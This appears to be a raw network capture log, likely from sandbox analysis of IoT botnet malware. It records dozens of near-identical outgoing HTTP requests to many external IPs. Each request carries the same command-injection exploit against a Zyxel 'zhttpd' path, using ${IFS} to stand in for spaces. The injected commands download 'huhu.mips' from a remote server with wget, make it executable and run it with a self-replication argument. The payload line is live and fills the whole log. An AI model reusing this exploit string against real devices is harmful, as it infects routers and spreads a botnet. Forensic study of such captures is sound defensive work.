                                                Jan 29, 2024 07:07:56.498891115 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6314192.168.2.234044272.143.72.235443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:56.498897076 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6315192.168.2.2351008126.247.188.85443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:56.498905897 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6316192.168.2.2349498161.29.225.197443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:56.498964071 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6317192.168.2.2345170219.148.65.76443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:56.498996973 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6318192.168.2.235347693.186.28.104443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:56.499036074 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6319192.168.2.23494282.225.209.182443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:56.499084949 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6320192.168.2.2350678144.119.73.75443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:56.499129057 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6321192.168.2.2342628168.190.247.246443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:56.499187946 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6322192.168.2.235256679.218.182.54443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:56.499219894 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6323192.168.2.2360142134.177.101.198443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:56.499263048 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6324192.168.2.2346642131.38.240.102443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:56.499313116 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6325192.168.2.2357216145.188.244.212443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:56.499346972 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6326192.168.2.2353042161.111.229.143443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:56.499381065 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6327192.168.2.233383474.231.187.231443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:56.499433994 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6328192.168.2.2357092130.185.205.176443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:56.499476910 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6329192.168.2.233678478.196.185.40443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:56.499515057 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6330192.168.2.2357572139.18.71.245443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:56.499541044 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6331192.168.2.234957084.111.234.184443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:56.499596119 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6332192.168.2.233293691.117.78.167443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:56.499625921 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6333192.168.2.235875861.84.25.164443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:56.499653101 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6334192.168.2.2351162132.208.75.165443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:56.499701023 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6335192.168.2.234040645.186.130.50443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:56.499735117 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6336192.168.2.2352430109.70.246.55443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:56.499762058 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6337192.168.2.235061032.99.246.225443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:56.499819040 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6338192.168.2.235330453.165.32.225443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:56.499862909 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6339192.168.2.233765079.187.114.127443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:56.499907017 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6340192.168.2.2341148114.17.186.238443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:56.499938011 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6341192.168.2.2360840102.12.107.226443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:56.499965906 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6342192.168.2.2342928105.127.103.118443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:56.500005007 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6343192.168.2.2334882170.23.150.109443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:56.500062943 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6344192.168.2.2339220160.51.86.164443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:56.500096083 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6345192.168.2.234321476.65.216.116443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:56.500135899 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6346192.168.2.2353660168.224.44.238443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:56.500173092 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6347192.168.2.2333698132.11.61.114443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:56.500196934 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6348192.168.2.2347680176.246.121.104443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:56.500250101 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6349192.168.2.235464258.34.253.128443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:56.500288963 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6350192.168.2.2334168113.69.64.5443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:56.500338078 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6351192.168.2.234299649.90.126.58443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:56.500380039 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6352192.168.2.235623046.86.0.155443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:56.500423908 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6353192.168.2.23473224.80.228.174443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:56.500441074 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6354192.168.2.2347238219.131.177.91443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:56.500487089 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6355192.168.2.2351926185.128.179.209443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:56.500535965 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6356192.168.2.2340454129.201.48.37443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:56.500587940 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6357192.168.2.234608034.139.135.160443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:56.500638008 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6358192.168.2.233974245.200.62.124443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:56.500680923 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6359192.168.2.2349912222.38.34.129443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:56.500700951 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6360192.168.2.2351962207.158.174.115443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:56.500747919 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6361192.168.2.235921264.79.214.83443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:56.500802040 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6362192.168.2.2360458220.1.31.146443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:56.500847101 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6363192.168.2.2350964115.227.136.101443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:56.500865936 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6364192.168.2.233405441.58.45.215443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:56.500900030 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6365192.168.2.2353612125.172.204.71443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:56.500955105 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6366192.168.2.2339886185.46.42.80443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:56.500983953 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6367192.168.2.2334338222.249.43.209443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:56.501015902 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6368192.168.2.2346802220.231.182.94443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:56.501061916 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6369192.168.2.2354056186.176.21.18443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:56.501104116 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6370192.168.2.235309459.125.230.53443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:56.501131058 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6371192.168.2.2356736190.147.230.53443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:56.501176119 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6372192.168.2.2359238211.179.45.117443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:56.501204014 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6373192.168.2.2337686221.167.183.6443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:56.501234055 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6374192.168.2.2342736130.103.233.219443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:56.501295090 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6375192.168.2.2356424111.207.53.192443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:56.501390934 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6376192.168.2.2355874133.44.171.194443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:56.501393080 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6377192.168.2.2343316114.106.25.208443
                                                TimestampBytes transferredDirectionData
